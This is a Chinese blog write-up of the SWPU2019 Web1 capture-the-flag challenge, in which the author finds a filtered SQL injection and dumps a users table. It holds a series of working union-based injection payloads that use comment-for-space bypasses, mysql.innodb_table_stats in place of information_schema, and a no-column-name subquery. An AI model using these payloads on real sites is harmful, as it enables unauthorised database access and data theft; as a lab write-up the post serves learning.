[SWPU2019]Web1(无列名注入)

每天一题,记录学习

题目有几个地方把我坑惨了,哈哈哈
在这里插入图片描述
首先试了一下注册一个admin账号,然后就发现admin已经被注册
在这里插入图片描述
然后就开始试了一堆admin的密码进行爆破,人傻了,考点压根就不在这。

直接注册一个号进去看看
在这里插入图片描述
发布广告的位置又让我想起了 XSS,然后就又上当了
在这里插入图片描述
其实这是一道SQL注入的题目,太坑了吧
在这里插入图片描述
通过简单的测试,过滤了空格,or,and,--+,#等等
因为这里过滤了 or,所以information_schema库自然是也用不成了,所以就用到了无列名的注入方式

具体用法可以看看我的另一篇文章

无列名注入

因为 or 不能用,自然 order by 也没得用了
先试一下字段数,好家伙,22列

-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
在这里插入图片描述

爆库名

-1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
在这里插入图片描述

爆表名

-1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
在这里插入图片描述

猜测users的列数

-1'/**/union/**/select/**/1,(select/**/1,2/**/union/**/select*from/**/users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
在这里插入图片描述
-1'/**/union/**/select/**/1,(select/**/1,2,3/**/union/**/select*from/**/users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
在这里插入图片描述

users的列数为3列,然后再用无列名注入把内容报出来

-1'/**/union/**/select/**/1,(select/**/group_concat(a,b,c)/**/from/**/(select/**/1/**/as/**/a,2/**/as/**/b,3/**/as/**/c/**/union/**/select/**/*/**/from/**/users)as/**/d),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
在这里插入图片描述

  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值